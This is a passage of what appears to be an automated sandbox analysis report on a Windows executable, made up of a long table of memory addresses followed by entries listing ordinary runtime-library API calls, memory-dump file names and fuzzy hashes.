                                                                                                0x00f7f3de
                                                                                                0x00f7f3dc
                                                                                                0x00000000
                                                                                                0x00f7f3a8
                                                                                                0x00000000
                                                                                                0x00f7f3e6
                                                                                                0x00f7f3ec
                                                                                                0x00f7f3f0
                                                                                                0x00f7f3f5
                                                                                                0x00f7f3f8
                                                                                                0x00f7f3f8
                                                                                                0x00000000
                                                                                                0x00f7f400
                                                                                                0x00f7f40c
                                                                                                0x00f7f413
                                                                                                0x00f7f418
                                                                                                0x00f7f41b
                                                                                                0x00f7f41d
                                                                                                0x00f7f423
                                                                                                0x00f7f423
                                                                                                0x00f7f427
                                                                                                0x00f7f429
                                                                                                0x00f7f42b
                                                                                                0x00f7f42d
                                                                                                0x00f7f460
                                                                                                0x00f7f460
                                                                                                0x00f7f42f
                                                                                                0x00f7f432
                                                                                                0x00f7f434
                                                                                                0x00f7f436
                                                                                                0x00f7f445
                                                                                                0x00f7f44a
                                                                                                0x00f7f438
                                                                                                0x00f7f43b
                                                                                                0x00f7f43e
                                                                                                0x00000000
                                                                                                0x00f7f440
                                                                                                0x00f7f440
                                                                                                0x00f7f440
                                                                                                0x00f7f43e
                                                                                                0x00f7f44d
                                                                                                0x00f7f455
                                                                                                0x00f7f458
                                                                                                0x00000000
                                                                                                0x00f7f45a
                                                                                                0x00f7f45a
                                                                                                0x00f7f45a
                                                                                                0x00f7f458
                                                                                                0x00f7f466
                                                                                                0x00f7f466
                                                                                                0x00f7f46a
                                                                                                0x00f7f46e
                                                                                                0x00f7f471
                                                                                                0x00f7f471
                                                                                                0x00f7f474
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7f476
                                                                                                0x00f7f479
                                                                                                0x00f7f47c
                                                                                                0x00f7f47e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7f47e
                                                                                                0x00f7f485
                                                                                                0x00f7f487
                                                                                                0x00f7f48a
                                                                                                0x00f7f48c
                                                                                                0x00f7f48f
                                                                                                0x00f7f497
                                                                                                0x00f7f499
                                                                                                0x00f7f49a
                                                                                                0x00f7f49a
                                                                                                0x00f7f49a
                                                                                                0x00f7f49b
                                                                                                0x00f7f49d
                                                                                                0x00f7f4a1
                                                                                                0x00f7f4a3
                                                                                                0x00f7f4de
                                                                                                0x00f7f4de
                                                                                                0x00f7f4e4
                                                                                                0x00f7f4a5
                                                                                                0x00f7f4a8
                                                                                                0x00f7f4ab
                                                                                                0x00f7f4c8
                                                                                                0x00f7f4cd
                                                                                                0x00f7f4ad
                                                                                                0x00f7f4ad
                                                                                                0x00f7f4b0
                                                                                                0x00f7f4b2
                                                                                                0x00f7f4b4
                                                                                                0x00000000
                                                                                                0x00f7f4b6
                                                                                                0x00f7f4b7
                                                                                                0x00f7f4b9
                                                                                                0x00f7f4bc
                                                                                                0x00f7f4c1
                                                                                                0x00f7f4c3
                                                                                                0x00f7f4c3
                                                                                                0x00f7f4b4
                                                                                                0x00f7f4d5
                                                                                                0x00f7f4d8
                                                                                                0x00000000
                                                                                                0x00f7f4da
                                                                                                0x00f7f4da
                                                                                                0x00f7f4da
                                                                                                0x00f7f4d8
                                                                                                0x00000000
                                                                                                0x00f7f4a3
                                                                                                0x00000000
                                                                                                0x00f7f4e6
                                                                                                0x00f7f4ec
                                                                                                0x00f7f4f0
                                                                                                0x00f7f4f5
                                                                                                0x00f7f4f8
                                                                                                0x00f7f4f8
                                                                                                0x00f7f423
                                                                                                0x00f7f130
                                                                                                0x00f7f130
                                                                                                0x00f7f132
                                                                                                0x00f7f134
                                                                                                0x00f7f136
                                                                                                0x00f7f138
                                                                                                0x00f7f13a
                                                                                                0x00f7f13c
                                                                                                0x00f7f173
                                                                                                0x00f7f173
                                                                                                0x00f7f179
                                                                                                0x00f7f13e
                                                                                                0x00f7f141
                                                                                                0x00f7f143
                                                                                                0x00f7f145
                                                                                                0x00f7f154
                                                                                                0x00f7f159
                                                                                                0x00f7f147
                                                                                                0x00f7f14a
                                                                                                0x00f7f14d
                                                                                                0x00000000
                                                                                                0x00f7f14f
                                                                                                0x00f7f14f
                                                                                                0x00f7f14f
                                                                                                0x00f7f14d
                                                                                                0x00f7f15c
                                                                                                0x00f7f164
                                                                                                0x00f7f167
                                                                                                0x00f7f16f
                                                                                                0x00000000
                                                                                                0x00f7f169
                                                                                                0x00f7f169
                                                                                                0x00f7f169
                                                                                                0x00f7f167
                                                                                                0x00f7f17c
                                                                                                0x00f7f180
                                                                                                0x00f7f180
                                                                                                0x00f7f183
                                                                                                0x00f7f187
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7f187
                                                                                                0x00f7f12e
                                                                                                0x00f7f500
                                                                                                0x00f7f500
                                                                                                0x00f7f500
                                                                                                0x00f7f503
                                                                                                0x00f7f503
                                                                                                0x00f7f50a
                                                                                                0x00f7f510
                                                                                                0x00f7f510
                                                                                                0x00f7f50c
                                                                                                0x00f7f50c
                                                                                                0x00f7f50e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7f50e
                                                                                                0x00f7f522
                                                                                                0x00f7f525
                                                                                                0x00f7f527
                                                                                                0x00f7f52e
                                                                                                0x00f7f531
                                                                                                0x00f7f534
                                                                                                0x00f7f56d
                                                                                                0x00f7f56d
                                                                                                0x00f7f576
                                                                                                0x00f7f57d
                                                                                                0x00f7f584
                                                                                                0x00f7f592
                                                                                                0x00f7f59c
                                                                                                0x00f7f536
                                                                                                0x00f7f536
                                                                                                0x00f7f53a
                                                                                                0x00f7f53c
                                                                                                0x00f7f541
                                                                                                0x00f7f562
                                                                                                0x00f7f562
                                                                                                0x00f7f564
                                                                                                0x00f7f567
                                                                                                0x00f7f567
                                                                                                0x00000000
                                                                                                0x00f7f543
                                                                                                0x00f7f543
                                                                                                0x00f7f54b
                                                                                                0x00f7f54e
                                                                                                0x00000000
                                                                                                0x00f7f550
                                                                                                0x00000000
                                                                                                0x00f7f550
                                                                                                0x00f7f54e
                                                                                                0x00f7f541
                                                                                                0x00f7ec49
                                                                                                0x00f7ec49
                                                                                                0x00f7ec4c
                                                                                                0x00f7ec4e
                                                                                                0x00f7ec53
                                                                                                0x00f7ec66
                                                                                                0x00f7ec66
                                                                                                0x00f7ec68
                                                                                                0x00f7ec6b
                                                                                                0x00f7ec6b
                                                                                                0x00000000
                                                                                                0x00f7ec55
                                                                                                0x00f7ec55
                                                                                                0x00f7ec58
                                                                                                0x00f7ec5d
                                                                                                0x00f7ec60
                                                                                                0x00f7f59d
                                                                                                0x00f7f59d
                                                                                                0x00f7f5a2
                                                                                                0x00f7f5a3
                                                                                                0x00f7f5a4
                                                                                                0x00f7f5a5
                                                                                                0x00f7f5a6
                                                                                                0x00f7f5a7
                                                                                                0x00f7f5a8
                                                                                                0x00f7f5a9
                                                                                                0x00f7f5aa
                                                                                                0x00f7f5ab
                                                                                                0x00f7f5ac
                                                                                                0x00f7f5ad
                                                                                                0x00f7f5ae
                                                                                                0x00f7f5af
                                                                                                0x00f7f5b0
                                                                                                0x00f7f5b1
                                                                                                0x00f7f5b2
                                                                                                0x00f7f5b3
                                                                                                0x00f7f5b4
                                                                                                0x00f7f5b6
                                                                                                0x00f7f5b9
                                                                                                0x00f7f5bc
                                                                                                0x00f7f5c0
                                                                                                0x00f7f5c2
                                                                                                0x00f7f5e4
                                                                                                0x00f7f5ed
                                                                                                0x00f7f5f0
                                                                                                0x00f7f6da
                                                                                                0x00000000
                                                                                                0x00f7f5f6
                                                                                                0x00f7f5f6
                                                                                                0x00f7f5fa
                                                                                                0x00f7f5fd
                                                                                                0x00f7f5ff
                                                                                                0x00f7f607
                                                                                                0x00f7f60b
                                                                                                0x00f7f60d
                                                                                                0x00f7f616
                                                                                                0x00f7f618
                                                                                                0x00f7f61a
                                                                                                0x00f7f60f
                                                                                                0x00f7f60f
                                                                                                0x00f7f60f
                                                                                                0x00f7f601
                                                                                                0x00f7f601
                                                                                                0x00f7f601
                                                                                                0x00f7f61d
                                                                                                0x00f7f61d
                                                                                                0x00f7f620
                                                                                                0x00f7f625
                                                                                                0x00f7f64e
                                                                                                0x00f7f650
                                                                                                0x00f7f65f
                                                                                                0x00f7f65f
                                                                                                0x00f7f652
                                                                                                0x00f7f65b
                                                                                                0x00f7f65b
                                                                                                0x00000000
                                                                                                0x00f7f627
                                                                                                0x00f7f627
                                                                                                0x00f7f627
                                                                                                0x00f7f62a
                                                                                                0x00f7f62c
                                                                                                0x00f7f6df
                                                                                                0x00f7f6df
                                                                                                0x00000000
                                                                                                0x00f7f632
                                                                                                0x00f7f635
                                                                                                0x00f7f63b
                                                                                                0x00f7f63d
                                                                                                0x00f7f6e4
                                                                                                0x00f7f6e4
                                                                                                0x00f7f6e9
                                                                                                0x00f7f6ea
                                                                                                0x00f7f6eb
                                                                                                0x00f7f6ec
                                                                                                0x00f7f6ed
                                                                                                0x00f7f6ee
                                                                                                0x00f7f6ef
                                                                                                0x00f7f6f0
                                                                                                0x00f7f6f1
                                                                                                0x00f7f6f3
                                                                                                0x00f7f6f5
                                                                                                0x00f7f6f7
                                                                                                0x00f7f72e
                                                                                                0x00f7f732
                                                                                                0x00f7f738
                                                                                                0x00f7f73d
                                                                                                0x00f7f6f9
                                                                                                0x00f7f6fc
                                                                                                0x00f7f6fe
                                                                                                0x00f7f700
                                                                                                0x00f7f70f
                                                                                                0x00f7f714
                                                                                                0x00f7f702
                                                                                                0x00f7f705
                                                                                                0x00f7f708
                                                                                                0x00000000
                                                                                                0x00f7f70a
                                                                                                0x00f7f70a
                                                                                                0x00f7f70a
                                                                                                0x00f7f708
                                                                                                0x00f7f717
                                                                                                0x00f7f71f
                                                                                                0x00f7f722
                                                                                                0x00000000
                                                                                                0x00f7f724
                                                                                                0x00f7f724
                                                                                                0x00f7f728
                                                                                                0x00f7f72d
                                                                                                0x00f7f72d
                                                                                                0x00f7f722
                                                                                                0x00f7f643
                                                                                                0x00f7f643
                                                                                                0x00f7f646
                                                                                                0x00f7f649
                                                                                                0x00f7f661
                                                                                                0x00f7f661
                                                                                                0x00f7f669
                                                                                                0x00f7f66c
                                                                                                0x00f7f66f
                                                                                                0x00f7f670
                                                                                                0x00f7f6ba
                                                                                                0x00f7f6bb
                                                                                                0x00f7f6bc
                                                                                                0x00f7f6c1
                                                                                                0x00f7f6c8
                                                                                                0x00f7f6cb
                                                                                                0x00000000
                                                                                                0x00f7f672
                                                                                                0x00f7f672
                                                                                                0x00f7f674
                                                                                                0x00f7f675
                                                                                                0x00f7f676
                                                                                                0x00f7f682
                                                                                                0x00f7f689
                                                                                                0x00f7f68a
                                                                                                0x00f7f68f
                                                                                                0x00f7f694
                                                                                                0x00f7f6a5
                                                                                                0x00f7f6a5
                                                                                                0x00f7f6a7
                                                                                                0x00f7f6d0
                                                                                                0x00f7f6d1
                                                                                                0x00f7f6d7
                                                                                                0x00f7f6a9
                                                                                                0x00f7f6aa
                                                                                                0x00f7f6b1
                                                                                                0x00f7f6b7
                                                                                                0x00f7f6b7
                                                                                                0x00f7f696
                                                                                                0x00f7f696
                                                                                                0x00f7f699
                                                                                                0x00f7f69b
                                                                                                0x00f7f69e
                                                                                                0x00f7f6a1
                                                                                                0x00000000
                                                                                                0x00f7f6a3
                                                                                                0x00f7f6a3
                                                                                                0x00000000
                                                                                                0x00f7f6a3
                                                                                                0x00f7f6a1
                                                                                                0x00f7f694
                                                                                                0x00f7f670
                                                                                                0x00f7f63d
                                                                                                0x00f7f62c
                                                                                                0x00f7f625
                                                                                                0x00f7f5c4
                                                                                                0x00f7f5c7
                                                                                                0x00f7f5ca
                                                                                                0x00f7f5cd
                                                                                                0x00f7f5cf
                                                                                                0x00f7f5cf
                                                                                                0x00f7f5d1
                                                                                                0x00f7f5d5
                                                                                                0x00f7f5d8
                                                                                                0x00f7f5e1
                                                                                                0x00f7f5e1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7ec60
                                                                                                0x00f7ec53
                                                                                                0x00f7ec47
                                                                                                0x00000000

                                                                                                Strings
                                                                                                • 0123456789ABCDEFabcdef-+XxPp, xrefs: 00F7E5F8
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                • String ID: 0123456789ABCDEFabcdef-+XxPp
                                                                                                • API String ID: 593203224-3606100449
                                                                                                • Opcode ID: 1ed3c57fa861a7604b3c51eb9449a1cf874ac5ec3d62b04e8d2bfe563882e1ce
                                                                                                • Instruction ID: 1fcc65f8c2894003d23ed0c2f7bf1e61143e194ffe5994fa9cd9ff43dc5f860f
                                                                                                • Opcode Fuzzy Hash: 1ed3c57fa861a7604b3c51eb9449a1cf874ac5ec3d62b04e8d2bfe563882e1ce
                                                                                                • Instruction Fuzzy Hash: B3C23874A002568FDB64CF28C440775B7B1BF1A314F6481EBD88D8B292D735DC9AEB62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0123456789-+Ee
                                                                                                • API String ID: 0-1347306980
                                                                                                • Opcode ID: 925e0d6d5c3fc1394e017299922eb05adbe4dc90ad6ca1fb9fccf237cfe852ee
                                                                                                • Instruction ID: bac1f592f6e81f9bcbf635bd44800cb83bc39fb62de68a67a7a082d706f00dce
                                                                                                • Opcode Fuzzy Hash: 925e0d6d5c3fc1394e017299922eb05adbe4dc90ad6ca1fb9fccf237cfe852ee
                                                                                                • Instruction Fuzzy Hash: FAC26F74A00245CFDB24CF24C4507B9BBF1AF56314FA484AED88D9B292D735DC86EB62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,0000FFFF), ref: 00FA8B67
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID:
                                                                                                • API String ID: 3997070919-0
                                                                                                • Opcode ID: 316a9eae0acc42e9488ab1c5d6df2546780e3c18d9b5caa7f51967dc5ac97bf2
                                                                                                • Instruction ID: f1f9546d30045b51d0e064bcd4d269a60e437f94fbe47509bbc16f7849555f9b
                                                                                                • Opcode Fuzzy Hash: 316a9eae0acc42e9488ab1c5d6df2546780e3c18d9b5caa7f51967dc5ac97bf2
                                                                                                • Instruction Fuzzy Hash: 27B18FB2610608DFD714CF28C486B657BE0FF463A4F258659E8DACF2A1C775E982DB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F80DA6
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: FeaturePresentProcessor
                                                                                                • String ID:
                                                                                                • API String ID: 2325560087-0
                                                                                                • Opcode ID: 74118f5260a45a8906a2dd239a7a2fcccdd4db06300ff81d787814a3312bbc4c
                                                                                                • Instruction ID: 0981a6778add03d2e21328233dcb07979b3493c94d312dae2bc152334609ee51
                                                                                                • Opcode Fuzzy Hash: 74118f5260a45a8906a2dd239a7a2fcccdd4db06300ff81d787814a3312bbc4c
                                                                                                • Instruction Fuzzy Hash: F251C2B1E016098FDB68CF65E9867AABBF1FB48320F24846AD809EB251D774D904DF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00FA5DF2: GetLastError.KERNEL32(?,?,00000008,00FAA789,00F85649,00F8568F), ref: 00FA5DF7
                                                                                                  • Part of subcall function 00FA5DF2: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00FA5E95
                                                                                                • EnumSystemLocalesW.KERNEL32(00FAC9A5,00000001,00000000,?,00FA3A81,?,00FACFDD,00000000,00000055,?,?), ref: 00FAC8F1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                                • String ID:
                                                                                                • API String ID: 2417226690-0
                                                                                                • Opcode ID: 51f7fa0960194abba098da54e5c4281a70593712c42ca9d45f2d72863ecf1f1c
                                                                                                • Instruction ID: 361afe1d8f0bcd9ca1c083569206eeee8bb29ab7f1e3c1b94068247cd17f85e9
                                                                                                • Opcode Fuzzy Hash: 51f7fa0960194abba098da54e5c4281a70593712c42ca9d45f2d72863ecf1f1c
                                                                                                • Instruction Fuzzy Hash: 3C118C7B6007014FEB189F39C8915BABB91FF85368B04442CE58687700D735B803D780
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00FA5DF2: GetLastError.KERNEL32(?,?,00000008,00FAA789,00F85649,00F8568F), ref: 00FA5DF7
                                                                                                  • Part of subcall function 00FA5DF2: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00FA5E95
                                                                                                • EnumSystemLocalesW.KERNEL32(00FACBFA,00000001,?,?,00FA3A81,?,00FACFA1,00FA3A81,00000055,?,?,?,?,00FA3A81,?,?), ref: 00FAC964
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                                • String ID:
                                                                                                • API String ID: 2417226690-0
                                                                                                • Opcode ID: 417f8125cfceae7c48073763211ca04b98c9dcd4f639b35b3d8ae91813173cd8
                                                                                                • Instruction ID: 443c1437a050452e8ee35631f165140bdcb59ad11f9b9e53f407f9290ab7230d
                                                                                                • Opcode Fuzzy Hash: 417f8125cfceae7c48073763211ca04b98c9dcd4f639b35b3d8ae91813173cd8
                                                                                                • Instruction Fuzzy Hash: DAF0F6762003045FDB145F399C85A7B7F95FF867A8B05842CF9464B690CA719C42EB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00FA5DF2: GetLastError.KERNEL32(?,?,00000008,00FAA789,00F85649,00F8568F), ref: 00FA5DF7
                                                                                                  • Part of subcall function 00FA5DF2: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00FA5E95
                                                                                                • EnumSystemLocalesW.KERNEL32(00FAC78B,00000001,?,?,?,00FACFFF,00FA3A81,00000055,?,?,?,?,00FA3A81,?,?,?), ref: 00FAC86B
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                                • String ID:
                                                                                                • API String ID: 2417226690-0
                                                                                                • Opcode ID: 45070f79213e0053995e804642d252749ac123c44e7c20a3b7907a373a0bfb97
                                                                                                • Instruction ID: b70207ae21795e1e7f010e9d3338ad993855fe99a44d1219bff1e5934136225c
                                                                                                • Opcode Fuzzy Hash: 45070f79213e0053995e804642d252749ac123c44e7c20a3b7907a373a0bfb97
                                                                                                • Instruction Fuzzy Hash: 59F0E57A70020557CB049F39DC89BAA7F94FFC2760B064058EA068B250D675D883EB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00FA4C0A: EnterCriticalSection.KERNEL32(?,?,00FAA475,00000000,00FCD510,0000000C,00FAA43C,?,?,00FA908F,?,?,00FA5F94,00000001,00000364,00000006), ref: 00FA4C19
                                                                                                • EnumSystemLocalesW.KERNEL32(00FA751B,00000001,00FCD470,0000000C,00FA793E,00000000), ref: 00FA7560
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                • String ID:
                                                                                                • API String ID: 1272433827-0
                                                                                                • Opcode ID: 95b46d8afbbdc0454a04ff39c34fb0a77cc16a605dbbf03361415580c48f095d
                                                                                                • Instruction ID: b4bf29a255a1fe562baa8ca8b8b92c9dd7a89157dfd5eca1f6ab224e2ab83db5
                                                                                                • Opcode Fuzzy Hash: 95b46d8afbbdc0454a04ff39c34fb0a77cc16a605dbbf03361415580c48f095d
                                                                                                • Instruction Fuzzy Hash: C2F03AB1A41304EFDB10EF68DD46B8D77B1FB05721F10825AF4149B2A1CB789A41AF81
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,?,?,00FA3BB0,?,20001004,?,00000002,00000000,?,?), ref: 00FA7ACF
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID:
                                                                                                • API String ID: 2299586839-0
                                                                                                • Opcode ID: c970f1849324e0380a7e4c8c96a708356fa0abda32b5a3d1804112ded19b3ef8
                                                                                                • Instruction ID: 2cd1f08134b4e61e8a23ac95c6e04c1b799537e99d7edbdc2a5077ed40dc627f
                                                                                                • Opcode Fuzzy Hash: c970f1849324e0380a7e4c8c96a708356fa0abda32b5a3d1804112ded19b3ef8
                                                                                                • Instruction Fuzzy Hash: 10E04F7250562CBBCF127F65DC08F9E3E29EF45760F044010FC0566261CB358922FAD4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0
                                                                                                • API String ID: 0-4108050209
                                                                                                • Opcode ID: 8cbfbe00632a7e03d043c659619b42f8ef7965ae42b671bfa330a9221e41a282
                                                                                                • Instruction ID: a34dec0134ee125227f5a3592c78f3bb50a4ebebf6e8dffb49fd99ea557d6f56
                                                                                                • Opcode Fuzzy Hash: 8cbfbe00632a7e03d043c659619b42f8ef7965ae42b671bfa330a9221e41a282
                                                                                                • Instruction Fuzzy Hash: 35518631E0464857FF388E6C8986BBEB79B9B81328F14041EE446DB682C656DD48F3C7
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(FD8FA683,?,00FB542C,000000FF), ref: 00F721AA
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: HeapProcess
                                                                                                • String ID:
                                                                                                • API String ID: 54951025-0
                                                                                                • Opcode ID: 453ff282850bea105464a91b472e8cde542b3d3c9df0fe4895e95a87e20eccee
                                                                                                • Instruction ID: f6ecca8b5c195b3fd352467cb09386db34c3dbf95fad151f6dfa58802fb5e9bb
                                                                                                • Opcode Fuzzy Hash: 453ff282850bea105464a91b472e8cde542b3d3c9df0fe4895e95a87e20eccee
                                                                                                • Instruction Fuzzy Hash: 24117CB0A06209EFD760DFA4F905B4A7BA6F343724F14436AE42587391D77A4504FF41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: AllocHeap
                                                                                                • String ID:
                                                                                                • API String ID: 4292702814-0
                                                                                                • Opcode ID: 2aa2562689d9fd3e91df3391d1423ffa1d56a3080aa69addffc132bc1d976d19
                                                                                                • Instruction ID: 05aa144f49be7012d5294338c9c720e010668b5831fceaefcba23e0bf5304115
                                                                                                • Opcode Fuzzy Hash: 2aa2562689d9fd3e91df3391d1423ffa1d56a3080aa69addffc132bc1d976d19
                                                                                                • Instruction Fuzzy Hash: 85329EB4E0020ACFCF24CF98C991ABEB7B5FF46314F2541A8D845A7355D636AE06DB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
